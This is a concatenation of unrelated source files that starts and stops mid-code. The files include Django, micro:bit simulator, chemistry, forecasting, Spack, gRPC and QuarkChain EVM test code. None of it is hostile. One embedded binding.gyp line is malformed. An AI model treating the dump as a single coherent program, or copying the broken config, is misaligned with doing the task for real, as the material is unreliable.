        decomposed_queryset = QuerysetParametersSerializer.decompose(
            _model=self.TestModelChild, _method_name='filter',
            parent_id=self._test_object_parent.pk
        )
        self.queryset_rebuilt = QuerysetParametersSerializer.rebuild(
            decomposed_queryset=decomposed_queryset
        )

        self._assertQuerysetEqual()
from django_tables2 import TemplateColumn

from service_catalog.models import GlobalHook
from Squest.utils.squest_table import SquestTable


class GlobalHookTable(SquestTable):
    """django-tables2 table definition for listing GlobalHook objects."""

    # Rendered via custom templates; "actions" is not sortable.
    state = TemplateColumn(template_name='custom_columns/global_hook_state.html')
    actions = TemplateColumn(
        template_name='custom_columns/global_hook_actions.html',
        orderable=False
    )

    class Meta:
        model = GlobalHook
        # HTML attributes applied to the <table> element.
        attrs = {"id": "global_hook_table", "class": "table squest-pagination-tables"}
        fields = ("name", "model", "state", "job_template", "actions")
from common import utils
from common.telemetry import telemetry_py
from common.telemetry_events import TelemetryEvent


class Compass:
    # The implementation is based off of
    # https://microbit-micropython.readthedocs.io/en/v1.0.1/compass.html.

    def _stub(self, function_name):
        # Every compass API in the simulator behaves identically: print the
        # standard "unimplemented" notice for the named function and record
        # one compass-API telemetry event.
        utils.print_for_unimplemented_functions(function_name)
        telemetry_py.send_telemetry(TelemetryEvent.MICROBIT_API_COMPASS)

    def calibrate(self):
        """
        This function is not implemented in the simulator.

        Starts the calibration process. When this function is called on the physical device, an instructive message will be scrolled to the user after which they will need to rotate the device in order to draw a circle on the LED display on the actual device.
        """
        self._stub(Compass.calibrate.__name__)

    def is_calibrated(self):
        """
        This function is not implemented in the simulator.

        Returns ``True`` if the compass has been successfully calibrated, and
        returns ``False`` otherwise.
        """
        self._stub(Compass.is_calibrated.__name__)

    def clear_calibration(self):
        """
        This function is not implemented in the simulator.

        Undoes the calibration, making the compass uncalibrated again.
        """
        self._stub(Compass.clear_calibration.__name__)

    def get_x(self):
        """
        This function is not implemented in the simulator.

        Gives the reading of the magnetic field strength on the ``x`` axis in nano
        tesla, as a positive or negative integer, depending on the direction of the
        field.
        """
        self._stub(Compass.get_x.__name__)

    def get_y(self):
        """
        This function is not implemented in the simulator.

        Gives the reading of the magnetic field strength on the ``y`` axis in nano
        tesla, as a positive or negative integer, depending on the direction of the
        field.
        """
        self._stub(Compass.get_y.__name__)

    def get_z(self):
        """
        This function is not implemented in the simulator.

        Gives the reading of the magnetic field strength on the ``z`` axis in nano
        tesla, as a positive or negative integer, depending on the direction of the
        field.
        """
        self._stub(Compass.get_z.__name__)

    def heading(self):
        """
        This function is not implemented in the simulator.

        Gives the compass heading, calculated from the above readings, as an
        integer in the range from 0 to 360, representing the angle in degrees,
        clockwise, with north as 0.
        """
        self._stub(Compass.heading.__name__)

    def get_field_strength(self):
        """
        This function is not implemented in the simulator.

        Returns an integer indication of the magnitude of the magnetic field around
        the device in nano tesla.
        """
        self._stub(Compass.get_field_strength.__name__)
# Copyright (c) Facebook, Inc. and its affiliates. (http://www.facebook.com)


def f():
    # Annotated-name statement inside a function body: binds no value, only an
    # annotation; `some_global` is read (unbound at runtime) by the print below.
    # NOTE(review): this file looks like a compiler/bytecode test fixture — the
    # EXPECTED section below is presumably consumed by a test harness; confirm
    # the harness format before editing.
    (some_global): int
    print(some_global)
# EXPECTED:
[
    ...,
    LOAD_CONST(Code((1, 0))),
    LOAD_CONST('f'),
    MAKE_FUNCTION(0),
    STORE_NAME('f'),
    LOAD_CONST(None),
    RETURN_VALUE(0),
    CODE_START('f'),
    ~LOAD_CONST('int'),
]
"""Script for testing selfies against large datasets.
"""

import argparse
import pathlib

import pandas as pd
from rdkit import Chem
from tqdm import tqdm

import selfies as sf

parser = argparse.ArgumentParser()
parser.add_argument("--data_path", type=str, default="version.smi.gz")
parser.add_argument("--col_name", type=str, default="isosmiles")
parser.add_argument("--sep", type=str, default=r"\s+")
parser.add_argument("--start_from", type=int, default=0)
args = parser.parse_args()

TEST_DIR = pathlib.Path(__file__).parent
TEST_SET_PATH = TEST_DIR / "test_sets" / args.data_path
ERROR_LOG_DIR = TEST_DIR / "error_logs"
ERROR_LOG_DIR.mkdir(exist_ok=True, parents=True)


def make_reader():
    """Return a fresh chunked reader over the test-set CSV."""
    return pd.read_csv(TEST_SET_PATH, sep=args.sep, chunksize=10000)


def roundtrip_translation():
    """SMILES -> SELFIES -> SMILES on every entry; log mismatches/errors.

    Failing input SMILES are appended to error_logs/<dataset>.txt and echoed
    through tqdm so the progress bar is not corrupted.
    """
    sf.set_semantic_constraints("hypervalent")

    # First pass only counts rows so the progress bar has a total.
    n_entries = 0
    for chunk in make_reader():
        n_entries += len(chunk)
    pbar = tqdm(total=n_entries)

    reader = make_reader()

    # FIX: open the error log in a context manager so it is closed (and
    # flushed) even if an unexpected exception aborts the run; the original
    # leaked the handle on any error before the final close().
    with open(ERROR_LOG_DIR / f"{TEST_SET_PATH.stem}.txt", "a+") as error_log:
        curr_idx = 0
        for chunk_idx, chunk in enumerate(reader):
            for in_smiles in chunk[args.col_name]:
                pbar.update(1)
                curr_idx += 1
                if curr_idx < args.start_from:
                    continue  # resume support: skip already-checked entries

                in_smiles = in_smiles.strip()
                mol = Chem.MolFromSmiles(in_smiles, sanitize=True)
                if (mol is None) or ("*" in in_smiles):
                    # Unparseable molecule or wildcard atom: out of scope.
                    continue

                try:
                    selfies = sf.encoder(in_smiles, strict=True)
                    out_smiles = sf.decoder(selfies)
                except (sf.EncoderError, sf.DecoderError):
                    error_log.write(in_smiles + "\n")
                    tqdm.write(in_smiles)
                    continue

                if not is_same_mol(in_smiles, out_smiles):
                    error_log.write(in_smiles + "\n")
                    tqdm.write(in_smiles)


def is_same_mol(smiles1, smiles2):
    """Return True iff the two SMILES canonicalize to the same string.

    Any RDKit failure is treated as "not the same" rather than propagated.
    """
    try:
        can_smiles1 = Chem.CanonSmiles(smiles1)
        can_smiles2 = Chem.CanonSmiles(smiles2)
        return can_smiles1 == can_smiles2
    except Exception:
        return False


if __name__ == "__main__":
    roundtrip_translation()
from typing import List, Optional  # NOQA

import chainer
from chainer import cuda
from chainer import functions
from chainer import links
import numpy  # NOQA


class Set2Set(chainer.Chain):
    r"""MPNN subsubmodule for readout part.

    See: <NAME>+, \
        Order Matters: Sequence to sequence for sets. November 2015.
        `arXiv:1511.06391 <https://arxiv.org/abs/1511.06391>`

    Args:
        in_channels (int): dimension of input feature vector
        n_layers (int): number of LSTM layers

    Returns (chainer.Variable):
        Output feature vector: (minibatch, in_channels * 2)
    """

    def __init__(self, in_channels, n_layers=1):
        # type: (int, int) -> None
        super(Set2Set, self).__init__()
        with self.init_scope():
            # LSTM consumes the previous query q* (2*in_channels) and emits a
            # new query of size in_channels.
            self.lstm_layer = links.NStepLSTM(
                n_layers=n_layers,
                in_size=in_channels * 2,
                out_size=in_channels,
                dropout=0)
        self.in_channels = in_channels
        self.n_layers = n_layers
        # Recurrent state carried across calls until reset_state().
        self.hx = None  # type: Optional[chainer.Variable]
        self.cx = None  # type: Optional[chainer.Variable]
        self.q_star = None  # type: Optional[List]

    def __call__(self, h):
        # type: (chainer.Variable) -> chainer.Variable
        # One Set2Set processing step over node features h.
        # NOTE(review): assumes h is (minibatch, node, ch) with
        # ch == self.in_channels — confirm with callers.
        xp = cuda.get_array_module(h)
        mb, node, ch = h.shape  # type: int, int, int
        if self.q_star is None:
            # First call: start from an all-zero query per sample.
            self.q_star = [
                xp.zeros((1, self.in_channels * 2)).astype('f')
                for _ in range(mb)
            ]
        self.hx, self.cx, q = self.lstm_layer(self.hx, self.cx, self.q_star)
        # self.hx: (mb, mb, ch)
        # self.cx: (mb, mb, ch)
        # q: List[(1, ch) * mb]
        q = functions.stack(q)  # q: (mb, 1, ch)
        q_ = functions.transpose(q, axes=(0, 2, 1))  # q_: (mb, ch, 1)
        # Attention logits of each node against the query.
        e = functions.matmul(h, q_)  # e: (mb, node, 1)
        a = functions.softmax(e)  # a: (mb, node, 1)
        a = functions.broadcast_to(a, h.shape)  # a: (mb, node, ch)
        # Attention-weighted readout over nodes.
        r = functions.sum((a * h), axis=1, keepdims=True)  # r: (mb, 1, ch)
        # New query q* = [q ; r], fed back into the LSTM next call.
        q_star_ = functions.concat((q, r), axis=2)  # q_star_: (mb, 1, ch*2)
        self.q_star = functions.separate(q_star_)
        return functions.reshape(q_star_, (mb, ch * 2))

    def reset_state(self):
        # type: () -> None
        # Drop all recurrent state; the next __call__ starts fresh.
        self.hx = None
        self.cx = None
        self.q_star = None
{"targets":[{"target_name":"index" "sources":["epoc.cc"] "include_dirs":["<!(node -e \"require('nan')\")"] "conditions":[['OS=="mac"' {"cflags":["-m64"] "ldflags":["-m64"] "xcode_settings":{"OTHER_CFLAGS":["-ObjC++"] "ARCHS":["x86_64"]} "link_settings":{"libraries":["/Library/Frameworks/edk.framework/edk"] "include_dirs":["./lib/includes/" "./lib/"]}}]]}]}<line_sep> |
# Fragment to switch off HCAL zero suppression as an option
# by cmsDriver customisation
# to generate Unsuppressed digis, one has to set the following parameter:
# process.simHcalDigis.useConfigZSvalues = 1
# to generate suppressed digis, useConfigZSvalues should be set to 0

import FWCore.ParameterSet.Config as cms


def customise(process):
    """Disable HCAL zero suppression on process.simHcalDigis and return process."""
    # -999 effectively disables zero suppression for every subdetector.
    for level_attr in ("HBlevel", "HElevel", "HOlevel", "HFlevel"):
        setattr(process.simHcalDigis, level_attr, -999)
    # Tell the digitizer to take the ZS thresholds from the config above.
    process.simHcalDigis.useConfigZSvalues = 1
    return process
import unittest, time, sys

# not needed, but in case you move it down to subdir
sys.path.extend(['.', '..', '../..', 'py'])
import h2o, h2o_cmd, h2o_import as h2i
import h2o_browse as h2b


class Basic(unittest.TestCase):
    """Single-test H2O cloud test: parse a known-bad gzip CSV from 'smalldata'."""

    def tearDown(self):
        # Fail the test if the H2O sandbox logs contain errors.
        h2o.check_sandbox_for_errors()

    @classmethod
    def setUpClass(cls):
        # Bring up the H2O cloud once for the whole class.
        h2o.init()

    @classmethod
    def tearDownClass(cls):
        h2o.tear_down_cloud()

    def test_fail1_100x1100(self):
        # NOTE(review): test name says 100x1100 but the file is 100x11000 —
        # presumably intentional fixture naming; confirm.
        parseResult = h2i.import_parse(bucket='smalldata', path='fail1_100x11000.csv.gz', schema='put', timeoutSecs=60, retryDelaySecs=0.15)


if __name__ == '__main__':
    h2o.unit_main()
from dataclasses import dataclass

from reinvent_scoring.scoring.diversity_filters.reinvent_core.diversity_filter_parameters import DiversityFilterParameters
from reinvent_scoring.scoring.scoring_function_parameters import ScoringFunctionParameters

from running_modes.configurations.reinforcement_learning.inception_configuration import InceptionConfiguration
from running_modes.configurations.reinforcement_learning.reinforcement_learning_configuration import ReinforcementLearningConfiguration


@dataclass
class ReinforcementLearningComponents:
    """This class holds the necessary configuration components to run RL"""
    # Core RL loop settings (agent/prior paths, steps, learning rate, ...).
    reinforcement_learning: ReinforcementLearningConfiguration
    # Parameters of the scoring function used as the reward signal.
    scoring_function: ScoringFunctionParameters
    # Diversity-filter settings that penalize repeated scaffolds.
    diversity_filter: DiversityFilterParameters
    # Inception (experience replay of high-scoring SMILES) settings.
    inception: InceptionConfiguration
"""
.. _howto_perroundmaxchannel:

Decoding Spots with :py:class:`.PerRoundMaxChannel`
===================================================

:py:class:`.PerRoundMaxChannel` is a :py:class:`.DecodeSpotsAlgorithm` that picks the channel with
maximum signal intensity for each round to construct a barcode and then matches the barcode to
:term:`codewords <Codeword>` in the :term:`codebook <Codebook>`. It is important to
:ref:`normalize<section_normalizing_intensities>` the images prior to
:py:class:`.PerRoundMaxChannel` if the channels have significant differences in range of
intensity values. The returned :py:class:`.DecodedIntensityTable` has a ``distance`` field that
is a decoding quality score. :term:`Spots traces <Feature (Spot, Pixel) Trace>` with higher signal
in non-max channels have a greater ``distance`` value reflecting lower confidence in the decoded
:term:`target <Target>`.

:py:class:`.PerRoundMaxChannel` can be used for linearly multiplexed and one hot multiplexed
:term:`codebooks <Codebook>`. Linearly multiplexed assays (e.g. osmFISH, sequential
smFISH, and RNAscope) can be decoded with :py:class:`.PerRoundMaxChannel` by setting
``trace_building_strategy=TraceBuildingStrategies.SEQUENTIAL``. One hot multiplexed assays (e.g.
in situ sequencing, seqFISH, and STARmap) are termed 'one hot' because every round has exactly one
hot channel. They can be decoded with :py:class:`.PerRoundMaxChannel` by setting
``trace_building_strategy=TraceBuildingStrategies.EXACT_MATCH`` or
``trace_building_strategy=TraceBuildingStrategies.NEAREST_NEIGHBORS``. The example below
demonstrates the recommended method for decoding one hot multiplexed
data using :py:class:`.PerRoundMaxChannel`.
"""

# Load in situ sequencing experiment and find spots
from starfish.image import ApplyTransform, LearnTransform, Filter
from starfish.types import Axes, TraceBuildingStrategies
from starfish import data, FieldOfView
from starfish.spots import FindSpots

experiment = data.ISS()
fov = experiment.fov()
imgs = fov.get_image(FieldOfView.PRIMARY_IMAGES)  # primary images
dots = fov.get_image("dots")  # reference round for image registration

# filter raw data
masking_radius = 15
filt = Filter.WhiteTophat(masking_radius, is_volume=False)
filt.run(imgs, in_place=True)
filt.run(dots, in_place=True)

# register primary images to reference round
learn_translation = LearnTransform.Translation(reference_stack=dots, axes=Axes.ROUND, upsampling=1000)
transforms_list = learn_translation.run(imgs.reduce({Axes.CH, Axes.ZPLANE}, func="max"))
warp = ApplyTransform.Warp()
warp.run(imgs, transforms_list=transforms_list, in_place=True)

# run blob detector on dots (reference image with every spot)
bd = FindSpots.BlobDetector(
    min_sigma=1,
    max_sigma=10,
    num_sigma=30,
    threshold=0.01,
    measurement_type='mean',
)
# Collapse round/z so the reference image contains every spot once.
dots_max = dots.reduce((Axes.ROUND, Axes.ZPLANE), func="max")
spots = bd.run(image_stack=imgs, reference_image=dots_max)

# Decode spots with PerRoundMaxChannel
from starfish.spots import DecodeSpots
decoder = DecodeSpots.PerRoundMaxChannel(
    codebook=experiment.codebook,
    trace_building_strategy=TraceBuildingStrategies.EXACT_MATCH)
decoded_intensities = decoder.run(spots=spots)
'''
Write a function sumprimes(l) that takes as input a list of integers l and returns the sum of all the prime numbers in l.

Here are some examples to show how your function should work.

>>> sumprimes([3,3,1,13])
19
'''


def sumprimes(l):
    """Return the sum of all prime numbers in the list *l*.

    Duplicates are counted each time they appear; an empty list sums to 0.
    """
    return sum(num for num in l if is_prime(num))


def is_prime(n):
    """Return True iff *n* is a prime number.

    Uses trial division up to sqrt(n) — O(sqrt n) with early exit, instead of
    the original O(n) scan that materialized every factor in a list.
    Values below 2 (including 0, 1 and negatives) are not prime.
    """
    if n < 2:
        return False
    if n < 4:
        return True  # 2 and 3 are prime
    if n % 2 == 0:
        return False
    divisor = 3
    while divisor * divisor <= n:
        if n % divisor == 0:
            return False
        divisor += 2
    return True
# Program for merge sort in linked list


class Node:
    """A single node of a singly linked list."""

    def __init__(self, data):
        self.data = data
        self.next = None


class LinkedList:
    """Singly linked list with tail append and merge sort."""

    def __init__(self):
        self.head = None

    def append(self, new_value):
        """Append new_value at the tail of the list (O(n) walk)."""
        new_node = Node(new_value)
        if self.head is None:
            self.head = new_node
            return
        curr_node = self.head
        while curr_node.next is not None:
            curr_node = curr_node.next
        curr_node.next = new_node

    def sortedMerge(self, a, b):
        """Merge two sorted lists headed by *a* and *b*; return the merged head.

        Iterative with a dummy head node — the original recursive version
        recursed once per merged node and could exceed Python's recursion
        limit (~1000) on lists of a few thousand elements.
        The merge is stable: on ties, nodes from *a* come first.
        """
        if a is None:
            return b
        if b is None:
            return a
        dummy = Node(None)
        tail = dummy
        while a is not None and b is not None:
            if a.data <= b.data:
                tail.next = a
                a = a.next
            else:
                tail.next = b
                b = b.next
            tail = tail.next
        # Attach whichever list still has nodes left.
        tail.next = a if a is not None else b
        return dummy.next

    # function for merge sort
    def mergeSort(self, h):
        """Sort the list headed by *h*; return the new head (O(n log n))."""
        if h is None or h.next is None:
            return h
        # get the middle of the list and split there
        middle = self.getMiddle(h)
        nexttomiddle = middle.next
        middle.next = None
        # Sort both halves, then merge them.
        left = self.mergeSort(h)
        right = self.mergeSort(nexttomiddle)
        return self.sortedMerge(left, right)

    # get middle element from the linked list
    def getMiddle(self, head):
        """Return the middle node using the slow/fast pointer technique."""
        if head is None:
            return head
        slow = head
        fast = head
        while fast.next is not None and fast.next.next is not None:
            slow = slow.next
            fast = fast.next.next
        return slow


def printList(head):
    """Print the list's values space-separated (blank line when empty)."""
    if head is None:
        print(' ')
        return
    curr_node = head
    while curr_node:
        print(curr_node.data, end=" ")
        curr_node = curr_node.next
    print(' ')


# Main Code
if __name__ == '__main__':
    li = LinkedList()
    for value in (67, 98, 45, 12, 43, 17):
        li.append(value)
    # Apply merge Sort
    li.head = li.mergeSort(li.head)
    print("Sorted Linked List is:")
    printList(li.head)
from accessify import accessify, private


# Example: the accessify decorators hide @private members from the instance's
# public surface.
@accessify
class Car:
    @private
    def start_engine(self):
        return 'Engine sound.'


if __name__ == '__main__':
    car = Car()
    # The private method must not appear in the instance's attribute listing.
    assert 'start_engine' not in dir(car)
from libcloud.container.types import Provider
from libcloud.container.providers import get_driver

# Connect to a Rancher host over plain HTTP (secure=False) on port 8080.
# NOTE(review): credentials and host are placeholders for documentation.
driver = get_driver(Provider.RANCHER)
connection = driver("MYRANCHERACCESSKEY", "MYRANCHERSECRETKEY", host="172.30.22.1", port=8080, secure=False)

# Find running containers created from the "docker:mysql" image.
search_results = connection.ex_search_containers(search_params={"imageUuid": "docker:mysql", "state": "running"})

id_of_first_result = search_results[0]['id']
import numpy as np
import pandas as pd
import pytest
from sklearn.linear_model import LinearRegression
from sklearn.linear_model import TheilSenRegressor

from etna.analysis import get_residuals
from etna.analysis import plot_residuals
from etna.analysis import plot_trend
from etna.analysis.plotters import _get_labels_names
from etna.datasets import TSDataset
from etna.metrics import MAE
from etna.models import LinearPerSegmentModel
from etna.pipeline import Pipeline
from etna.transforms import BinsegTrendTransform
from etna.transforms import LagTransform
from etna.transforms import LinearTrendTransform
from etna.transforms import STLTransform
from etna.transforms import TheilSenTrendTransform


@pytest.fixture
def residuals():
    # Two-segment daily dataset with known constant forecasts, so the
    # expected residuals can be written down exactly.
    timestamp = pd.date_range("2020-01-01", periods=100, freq="D")
    df = pd.DataFrame(
        {
            "timestamp": timestamp.tolist() * 2,
            "segment": ["segment_0"] * len(timestamp) + ["segment_1"] * len(timestamp),
            "target": np.arange(len(timestamp)).tolist() + (np.arange(len(timestamp)) + 1).tolist(),
        }
    )
    df_wide = TSDataset.to_dataset(df)
    ts = TSDataset(df=df_wide, freq="D")

    # Constant forecasts (-1 for segment_0, +1 for segment_1) over the last
    # 90 timestamps.
    forecast_df = ts[timestamp[10:], :, :]
    forecast_df.loc[:, pd.IndexSlice["segment_0", "target"]] = -1
    forecast_df.loc[:, pd.IndexSlice["segment_1", "target"]] = 1

    # Expected residuals = target - forecast.
    residuals_df = ts[timestamp[10:], :, :]
    residuals_df.loc[:, pd.IndexSlice["segment_0", "target"]] += 1
    residuals_df.loc[:, pd.IndexSlice["segment_1", "target"]] -= 1

    return residuals_df, forecast_df, ts


def test_get_residuals(residuals):
    """Test that get_residuals finds residuals correctly."""
    residuals_df, forecast_df, ts = residuals
    actual_residuals = get_residuals(forecast_df=forecast_df, ts=ts)
    assert actual_residuals.to_pandas().equals(residuals_df)


def test_get_residuals_not_matching_lengths(residuals):
    """Test that get_residuals fails to find residuals correctly if ts hasn't answers."""
    residuals_df, forecast_df, ts = residuals
    # Truncate the dataset so forecast timestamps are missing from ts.
    ts = TSDataset(df=ts[ts.index[:-10], :, :], freq="D")
    with pytest.raises(KeyError):
        _ = get_residuals(forecast_df=forecast_df, ts=ts)


def test_get_residuals_not_matching_segments(residuals):
    """Test that get_residuals fails to find residuals correctly if segments of dataset and forecast differ."""
    residuals_df, forecast_df, ts = residuals
    # Rename one forecast segment so the segment sets diverge.
    columns_frame = forecast_df.columns.to_frame()
    columns_frame["segment"] = ["segment_0", "segment_3"]
    forecast_df.columns = pd.MultiIndex.from_frame(columns_frame)
    with pytest.raises(KeyError, match="Segments of `ts` and `forecast_df` should be the same"):
        _ = get_residuals(forecast_df=forecast_df, ts=ts)


def test_plot_residuals_fails_unkown_feature(example_tsdf):
    """Test that plot_residuals fails if meet unknown feature."""
    pipeline = Pipeline(model=LinearPerSegmentModel(), transforms=[LagTransform(in_column="target", lags=[5, 6, 7])], horizon=5)
    metrics, forecast_df, info = pipeline.backtest(ts=example_tsdf, metrics=[MAE()], n_folds=3)
    with pytest.raises(ValueError, match="Given feature isn't present in the dataset"):
        plot_residuals(forecast_df=forecast_df, ts=example_tsdf, feature="unkown_feature")


@pytest.mark.parametrize(
    "poly_degree, trend_transform_class",
    (
        [1, LinearTrendTransform],
        [2, LinearTrendTransform],
        [1, TheilSenTrendTransform],
        [2, TheilSenTrendTransform],
    ),
)
def test_plot_trend(poly_degree, example_tsdf, trend_transform_class):
    # Smoke test: plotting must not raise for degree-1/2 trends.
    plot_trend(ts=example_tsdf, trend_transform=trend_transform_class(in_column="target", poly_degree=poly_degree))


@pytest.mark.parametrize("detrend_model", (TheilSenRegressor(), LinearRegression()))
def test_plot_bin_seg(example_tsdf, detrend_model):
    # Smoke test for change-point (Binseg) trend plotting.
    plot_trend(ts=example_tsdf, trend_transform=BinsegTrendTransform(in_column="target", detrend_model=detrend_model))


@pytest.mark.parametrize("period", (7, 30))
def test_plot_stl(example_tsdf, period):
    # Smoke test for STL trend plotting at weekly/monthly periods.
    plot_trend(ts=example_tsdf, trend_transform=STLTransform(in_column="target", period=period))


@pytest.mark.parametrize(
    "poly_degree, expect_values, trend_class",
    (
        [1, True, LinearTrendTransform],
        [2, False, LinearTrendTransform],
        [1, True, TheilSenTrendTransform],
        [2, False, TheilSenTrendTransform],
    ),
)
def test_get_labels_names_linear_coeffs(example_tsdf, poly_degree, expect_values, trend_class):
    # Slope labels are only produced for degree-1 (linear) trends.
    ln_tr = trend_class(in_column="target", poly_degree=poly_degree)
    example_tsdf.fit_transform([ln_tr])
    segments = example_tsdf.segments
    _, linear_coeffs = _get_labels_names([ln_tr], segments)
    if expect_values:
        assert list(linear_coeffs.values()) != ["", ""]
    else:
        assert list(linear_coeffs.values()) == ["", ""]
# Copyright 2013-2021 Lawrence Livermore National Security, LLC and other
# Spack Project Developers. See the top-level COPYRIGHT file for details.
#
# SPDX-License-Identifier: (Apache-2.0 OR MIT)

import glob
import os
import zipfile

from spack import *


class PyFlitCore(PythonPackage):
    """Distribution-building parts of Flit."""

    homepage = "https://github.com/takluyver/flit"
    url = "https://github.com/takluyver/flit/archive/refs/tags/3.3.0.tar.gz"
    maintainers = ['takluyver']

    version('3.3.0', sha256='f5340b268563dd408bf8e2df6dbc8d4d08bc76cdff0d8c7f8a4be94e5f01f22f')

    depends_on('python@3.4:', type=('build', 'run'))
    depends_on('py-toml', type=('build', 'run'))

    def build(self, spec, prefix):
        # flit_core ships its own wheel-building script instead of setup.py.
        with working_dir('flit_core'):
            python('build_dists.py')

    def install(self, spec, prefix):
        # Unzip the built wheel straight into the pure-python site-packages
        # dir (wheels are plain zip archives).
        wheel = glob.glob(os.path.join('flit_core', 'dist', '*.whl'))[0]
        with zipfile.ZipFile(wheel) as f:
            f.extractall(python_purelib)
import grpc

import snippets_pb2
import snippets_pb2_grpc
from google.protobuf.struct_pb2 import NullValue

# Demonstrates sending a protobuf Struct null value over gRPC: update snippet
# id=1, explicitly nulling its "language" field.
with grpc.insecure_channel('localhost:50051') as channel:
    stub = snippets_pb2_grpc.SnippetControllerStub(channel)
    request = snippets_pb2.Snippet(id=1, title='snippet title')
    # send non-null value
    # request.language.value = "python"
    # send null value
    request.language.null = NullValue.NULL_VALUE
    response = stub.Update(request)
    print(response, end='')
# Service info
APP = "vertica"  # service identifier used by the surrounding tooling
import sys

from quarkchain.evm.state import State
from quarkchain.evm.common import FakeHeader
from quarkchain.evm.utils import (
    decode_hex,
    parse_int_or_hex,
    sha3,
    to_string,
    remove_0x_head,
    encode_hex,
    big_endian_to_int,
)
from quarkchain.evm.config import default_config, Env
from quarkchain.config import get_default_evm_config
from quarkchain.evm.exceptions import InvalidTransaction
import quarkchain.evm.transactions as transactions
from quarkchain.evm.messages import apply_transaction
from quarkchain.evm.specials import specials, configure_special_contract_ts
import copy
import os
from quarkchain.db import InMemoryDb
from quarkchain.utils import token_id_encode

# Verbose EVM trace config; only used by the commented-out logging call below.
config_string = ":info,eth.vm.log:trace,eth.vm.op:trace,eth.vm.stack:trace,eth.vm.exit:trace,eth.pb.msg:trace,eth.pb.tx:debug"

konfig = copy.copy(default_config)

# configure_logging(config_string=config_string)

fixture_path = os.path.join(os.path.dirname(__file__), "../..", "fixtures")

# Cache of synthetic block headers keyed by block number (see mk_fake_header).
fake_headers = {}


def mk_fake_header(blknum):
    # Lazily build (and memoize) a deterministic fake header whose hash is
    # derived from the block number, so prev_headers are reproducible.
    if blknum not in fake_headers:
        fake_headers[blknum] = FakeHeader(sha3(to_string(blknum)))
    return fake_headers[blknum]


# Default block environment used when a test does not supply one.
basic_env = {
    "currentCoinbase": "0x2adc25665018aa1fe0e6bc666dac8fc2697ff9ba",
    "currentDifficulty": "0x020000",
    "currentGasLimit": "0x7fffffffffffffff",
    "currentNumber": "0x01",
    "currentTimestamp": "0x03e8",
    "previousHash": "0x5e20a0453cecd065ea59c37ac63e079ee08998b6045136a8ce6635c7912ec0b6",
}

evm_config = get_default_evm_config()
# Only forks listed here are verified; others in a fixture are skipped.
network_to_test = {"ConstantinopleFix"}

# Makes a diff between a prev and post state
def mk_state_diff(prev, post):
    """Return a human-readable diff between two account-state dicts.

    Removed accounts map to ["-", old], added accounts to ["+", new]; changed
    accounts map to a per-field dict where each differing field is
    [old, "->", new] and "storage" is itself a slot-level diff.
    """
    diff = {}
    # Accounts present before but gone afterwards.
    for addr in prev.keys():
        if addr not in post:
            diff[addr] = ["-", prev[addr]]
    for addr in post.keys():
        if addr not in prev:
            diff[addr] = ["+", post[addr]]
        elif prev[addr] != post[addr]:
            account_diff = {}
            for field in ("nonce", "token_balances", "code"):
                if prev[addr][field] != post[addr][field]:
                    account_diff[field] = [prev[addr][field], "->", post[addr][field]]
            prev_storage = prev[addr]["storage"]
            post_storage = post[addr]["storage"]
            if prev_storage != post_storage:
                storage_diff = {}
                # Slots that disappeared.
                for slot in prev_storage.keys():
                    if slot not in post_storage:
                        storage_diff[slot] = ["-", prev_storage[slot]]
                # Slots added, plus every surviving slot recorded as a
                # transition (even when the value is unchanged).
                for slot in post_storage.keys():
                    if slot not in prev_storage:
                        storage_diff[slot] = ["+", post_storage[slot]]
                    else:
                        storage_diff[slot] = [prev_storage[slot], "->", post_storage[slot]]
                account_diff["storage"] = storage_diff
            diff[addr] = account_diff
    return diff


# Compute a single unit of a state test
def compute_state_test_unit(state, txdata, indices, konfig, is_qkc_state, qkc_env=None):
    """Apply one (gas, value, data) combination of a state test transaction.

    Returns a dict with the resulting state root hash, the indices used and a
    prev->post state diff. The state itself is reverted before returning, so
    the same State object can be reused for the next combination.
    """
    state.env.config = konfig
    s = state.snapshot()
    if "transferTokenId" in txdata:
        transfer_token_id = parse_int_or_hex(
            txdata["transferTokenId"][indices["transferTokenId"]]
        )
    else:
        transfer_token_id = token_id_encode("QKC")
    # FIX: snapshot the pre-state BEFORE the try block. Previously `prev` was
    # assigned inside the try, so an InvalidTransaction raised while building
    # the transaction left `prev` unbound and mk_state_diff() below crashed
    # with a NameError instead of reporting the (empty) diff.
    prev = copy.deepcopy(state.to_dict())
    try:
        # Create the transaction
        tx = transactions.Transaction(
            nonce=parse_int_or_hex(txdata["nonce"] or b"0"),
            gasprice=parse_int_or_hex(txdata["gasPrice"] or b"0"),
            startgas=parse_int_or_hex(txdata["gasLimit"][indices["gas"]] or b"0"),
            to=decode_hex(remove_0x_head(txdata["to"])),
            value=parse_int_or_hex(txdata["value"][indices["value"]] or b"0"),
            data=decode_hex(remove_0x_head(txdata["data"][indices["data"]])),
            gas_token_id=token_id_encode("QKC"),
            transfer_token_id=transfer_token_id,
            # Should not set testing flag if testing QuarkChain state
            is_testing=not is_qkc_state,
        )
        tx.set_quark_chain_config(qkc_env.quark_chain_config)
        if "secretKey" in txdata:
            tx.sign(decode_hex(remove_0x_head(txdata["secretKey"])))
        else:
            # Unsigned fixture: poke `v` directly under the mutable-context
            # escape hatch.
            tx._in_mutable_context = True
            tx.v = parse_int_or_hex(txdata["v"])
            tx._in_mutable_context = False
        # Run it
        success, output = apply_transaction(state, tx, tx_wrapper_hash=bytes(32))
    except InvalidTransaction as e:
        print("Exception: %r" % e)
        success, output = False, b""
    # touch coinbase, make behavior consistent with go-ethereum
    state.delta_token_balance(state.block_coinbase, token_id_encode("QKC"), 0)
    state.commit()
    post = state.to_dict()
    output_decl = {
        "hash": "0x" + encode_hex(state.trie.root_hash),
        "indexes": indices,
        "diff": mk_state_diff(prev, post),
    }
    state.revert(s)
    return output_decl


# Initialize the state for state tests
def init_state(env, pre, is_qkc_state, qkc_env=None):
    """Build a State for a fixture: block env from `env`, accounts from `pre`."""
    # Setup env
    db = InMemoryDb()
    state_env = Env(config=konfig)
    state_env.db = db
    state = State(
        env=state_env,
        block_prevhash=decode_hex(remove_0x_head(env["previousHash"])),
        # Up to 256 fake ancestor headers, newest first (BLOCKHASH support).
        prev_headers=[
            mk_fake_header(i)
            for i in range(
                parse_int_or_hex(env["currentNumber"]) - 1,
                max(-1, parse_int_or_hex(env["currentNumber"]) - 257),
                -1,
            )
        ],
        block_number=parse_int_or_hex(env["currentNumber"]),
        block_coinbase=decode_hex(remove_0x_head(env["currentCoinbase"])),
        block_difficulty=parse_int_or_hex(env["currentDifficulty"]),
        gas_limit=parse_int_or_hex(env["currentGasLimit"]),
        timestamp=parse_int_or_hex(env["currentTimestamp"]),
